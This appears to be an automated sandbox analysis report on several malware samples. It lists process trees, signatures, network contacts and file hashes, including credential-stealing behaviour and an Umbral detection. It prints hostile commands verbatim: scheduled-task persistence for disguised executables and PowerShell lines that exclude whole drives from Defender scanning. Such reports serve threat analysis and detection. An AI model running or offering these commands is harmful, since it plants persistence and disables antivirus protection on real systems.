schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Cursors\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Cursors\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Windows\Cursors\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\IME\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Windows\IME\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca1" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca1" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Default\AppData\Roaming\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\TAPI\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20272816811517310018-1390373246-1608324919-1314573328-1585965784-1244662269799342459"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q3rpLXaa8e.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Uninstall Information\spoolsv.exe
"C:\Program Files\Uninstall Information\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\608a7d24-9261-4483-abdc-de1817c1c715.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6531a927-b2aa-4c94-8cf8-f037baacc273.vbs"
C:\Program Files\Uninstall Information\spoolsv.exe
"C:\Program Files\Uninstall Information\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0d141fdb-af58-4a20-b467-6e47f0dad324.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3918262b-3937-44e7-af1c-f1fe2becc0ef.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0889572.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
Files
memory/1668-0-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/1668-1-0x0000000001180000-0x0000000001A78000-memory.dmp
memory/1668-2-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1668-3-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/1668-4-0x0000000000250000-0x000000000025E000-memory.dmp
memory/1668-5-0x0000000000270000-0x000000000027E000-memory.dmp
memory/1668-7-0x00000000002B0000-0x00000000002CC000-memory.dmp
memory/1668-6-0x0000000000280000-0x0000000000288000-memory.dmp
memory/1668-12-0x0000000000830000-0x0000000000842000-memory.dmp
memory/1668-11-0x0000000000810000-0x0000000000818000-memory.dmp
memory/1668-10-0x00000000005E0000-0x00000000005F6000-memory.dmp
memory/1668-9-0x00000000005D0000-0x00000000005E0000-memory.dmp
memory/1668-8-0x0000000000290000-0x0000000000298000-memory.dmp
memory/1668-13-0x0000000000850000-0x000000000085C000-memory.dmp
memory/1668-15-0x0000000000840000-0x0000000000850000-memory.dmp
memory/1668-16-0x0000000000B00000-0x0000000000B0A000-memory.dmp
memory/1668-14-0x0000000000820000-0x0000000000828000-memory.dmp
memory/1668-17-0x0000000000C40000-0x0000000000C96000-memory.dmp
memory/1668-18-0x0000000000B10000-0x0000000000B1C000-memory.dmp
memory/1668-21-0x0000000000E90000-0x0000000000E98000-memory.dmp
memory/1668-20-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/1668-19-0x0000000000B20000-0x0000000000B28000-memory.dmp
memory/1668-23-0x0000000000EA0000-0x0000000000EB2000-memory.dmp
memory/1668-24-0x0000000000FD0000-0x0000000000FDC000-memory.dmp
memory/1668-25-0x0000000000FE0000-0x0000000000FEC000-memory.dmp
memory/1668-27-0x0000000001000000-0x000000000100C000-memory.dmp
memory/1668-28-0x0000000001010000-0x000000000101C000-memory.dmp
memory/1668-30-0x0000000001020000-0x000000000102C000-memory.dmp
memory/1668-32-0x0000000001050000-0x000000000105E000-memory.dmp
memory/1668-34-0x0000000001170000-0x000000000117E000-memory.dmp
memory/1668-38-0x000000001B9C0000-0x000000001B9CA000-memory.dmp
memory/1668-39-0x000000001B9D0000-0x000000001B9DC000-memory.dmp
memory/1668-37-0x000000001B9B0000-0x000000001B9B8000-memory.dmp
memory/1668-36-0x000000001B9A0000-0x000000001B9AC000-memory.dmp
memory/1668-35-0x000000001B990000-0x000000001B998000-memory.dmp
memory/1668-33-0x0000000001060000-0x0000000001068000-memory.dmp
memory/1668-31-0x0000000001040000-0x000000000104A000-memory.dmp
memory/1668-29-0x0000000001030000-0x0000000001038000-memory.dmp
memory/1668-26-0x0000000000FF0000-0x0000000000FF8000-memory.dmp
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\services.exe
| MD5 | 5d8505501b7faa4c7e541b0a32467a58 |
| SHA1 | ed0b9de10c38774af49d9279e25a8958817f33a7 |
| SHA256 | 1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca |
| SHA512 | a1fb110b16700001f75d4f74d93746349b5e2e78d4a5dde84c00ffe4eeed914cf7a3702de507c9a287f6df54a4cc0a4010a6bc28e4b641e8d5dcf20db6a302d9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 86ac014efc43cf459d29b32a36b6e262 |
| SHA1 | 531463e31967c8920ab62e1125020575917f4f37 |
| SHA256 | 4665a90f57b333a2fbcd0a42ae6d272d67bd27377a729a0d5fcc8e93de318370 |
| SHA512 | e95a45afea7079487bf72592bc402bad28e97ad518d50d3501a0bff2c01e639f7b79ae7b909b657925e7e4dc4d59e5b5191060654c790873f69ddba43a60c19b |
memory/2188-97-0x000000001B110000-0x000000001B3F2000-memory.dmp
memory/1668-99-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/2188-98-0x0000000002560000-0x0000000002568000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\W2tbEWSDqo.bat
| MD5 | aa0b9e0f88381eda8d944665d6da46ea |
| SHA1 | d40b34a27fda89aac8b0ed4a84bd6aed977da5a3 |
| SHA256 | 39993992eed25b350785f8a40589b971dbef574b393c05fe223f72d88c7fc223 |
| SHA512 | db5bb7052d4ef0716927f2f24c80159e5865e157c6c2b0c9bfd73a51d442ab31f42831640a888c01461817f8eabeb638df06cd47b30d37276e9e45ce1c7a7722 |
memory/1668-73-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/2668-142-0x0000000000C20000-0x0000000000C32000-memory.dmp
memory/2668-143-0x000000001B640000-0x000000001B696000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2704-224-0x000000001B360000-0x000000001B642000-memory.dmp
memory/1040-245-0x0000000001ED0000-0x0000000001ED8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\q3rpLXaa8e.bat
| MD5 | 9cd659e78563f6a2e3146fe63bcf9221 |
| SHA1 | 2a190fa2a5255205a1af6133ca9a57685a34f5a7 |
| SHA256 | f1247a59e52c54d0688482543a6e6b45c42c592167117abf45eb4e4ef072077c |
| SHA512 | e6b965276cd80d8309586e143dd6b3b209f2d03bf6ad1e2730e4c031ddb03317c842327d2a743322fd83d29846d2c7b1dfdccb078b8be3986c82bdf4ff98b633 |
memory/1928-269-0x00000000012D0000-0x0000000001BC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\608a7d24-9261-4483-abdc-de1817c1c715.vbs
| MD5 | 198591adace4d5382e49473dfc678fd1 |
| SHA1 | 60a4314573d45035af8b2c0bfcdbcc1c219d7b57 |
| SHA256 | 0cfcf719dd54316bdb5700ca203daacf7ececfdb99717ed5e860a7225e2e2307 |
| SHA512 | b61b3cd39654597919bec92aac95ff3209fc8a39407e5266db7f14e71bc19ebfe6f31ffe33b5f61a2dbab698f2d1a7afe19002d1938488733095bc150f238772 |
C:\Users\Admin\AppData\Local\Temp\6531a927-b2aa-4c94-8cf8-f037baacc273.vbs
| MD5 | 0b802e1cbfbdce7f7239ed80629f3332 |
| SHA1 | d479ca79ea96df2bf5d2548b7adf1646d60d0629 |
| SHA256 | 7b35dc94bfb6a9ec507ef3a742dc2b9ed60abf67a67632f4f27c7f6534a066ac |
| SHA512 | 6f38315ba5ffc67e35223cf673ab159681e68e5c310b33e418635459e3f73ad1c2b8c9b03b00134bca36240623c3ae50625284b83e7cc83d183e7f56dfe58fc2 |
C:\Users\Admin\AppData\Local\Temp\0d141fdb-af58-4a20-b467-6e47f0dad324.vbs
| MD5 | 3c55335b9cae1ab0ae39d030d1a16c90 |
| SHA1 | 1d0c433df4badae55cb9f988eeebec7e03bd11bc |
| SHA256 | d1e63386c78806d417c8ab0430b77b01c89848c92768cd9b3a080ebce16614c8 |
| SHA512 | 651473bf680bd1be903e099505697642f5f59d2bd0f9823dcc07a47ccbedc374b82ffd4166e693b0fc8dbd99d9b802693b5bd2d54c51d48ebbe5606d8acc2686 |
Analysis: behavioral24
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
133s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\app.exe" | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3540 set thread context of 216 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
| PID 3540 set thread context of 3012 | N/A | C:\Users\Admin\AppData\Roaming\app.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\app.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\My.RawFile.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe
"C:\Users\Admin\AppData\Local\Temp\1b7c2cbdf74b50ca0c081bd3404b8054bd85c6e0ab7b65f5863d2dd3d2fc9cfc.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\app.exe
"C:\Users\Admin\AppData\Roaming\app.exe"
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
"C:\Users\Admin\AppData\Roaming\My.RawFile.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | smtp.yandex.com | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/1384-0-0x0000000074FF2000-0x0000000074FF3000-memory.dmp
memory/1384-1-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-2-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-5-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-6-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-18-0x0000000074FF2000-0x0000000074FF3000-memory.dmp
memory/1384-19-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-20-0x0000000074FF0000-0x00000000755A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | 2a36c9ca52118eb7a7364b577e156cd5 |
| SHA1 | 83f62a4a8643b9dfd89f6750a1b5e63a9d525b17 |
| SHA256 | 6fa17b9dbde9b2f03975a5b5f44d7d2d4153aed94bebbd2098939a3562dac901 |
| SHA512 | bfbea8459c5135b6b21a2dc5bd149b0f775e4d540f7868252beb4e344e9de6e9040cb791da04186d487d92ef45a890154f80e62ebd16ac828f81ac2f6071732a |
memory/3540-33-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-32-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/1384-31-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-35-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-34-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-37-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-38-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-39-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/3540-40-0x0000000074FF0000-0x00000000755A1000-memory.dmp
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aspnet_compiler.exe.log
| MD5 | b3ac9d09e3a47d5fd00c37e075a70ecb |
| SHA1 | ad14e6d0e07b00bd10d77a06d68841b20675680b |
| SHA256 | 7a23c6e7ccd8811ecdf038d3a89d5c7d68ed37324bae2d4954125d9128fa9432 |
| SHA512 | 09b609ee1061205aa45b3c954efc6c1a03c8fd6b3011ff88cf2c060e19b1d7fd51ee0cb9d02a39310125f3a66aa0146261bdee3d804f472034df711bc942e316 |
memory/216-55-0x0000000000400000-0x0000000000410000-memory.dmp
memory/3540-61-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-62-0x0000000074FF0000-0x00000000755A1000-memory.dmp
memory/2176-63-0x0000000074FF0000-0x00000000755A1000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241023-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Umbral family
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1be2b92ceabc55905ef2d5a4d28e28f80931887ca1b7aa2557775e09402d36ae.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
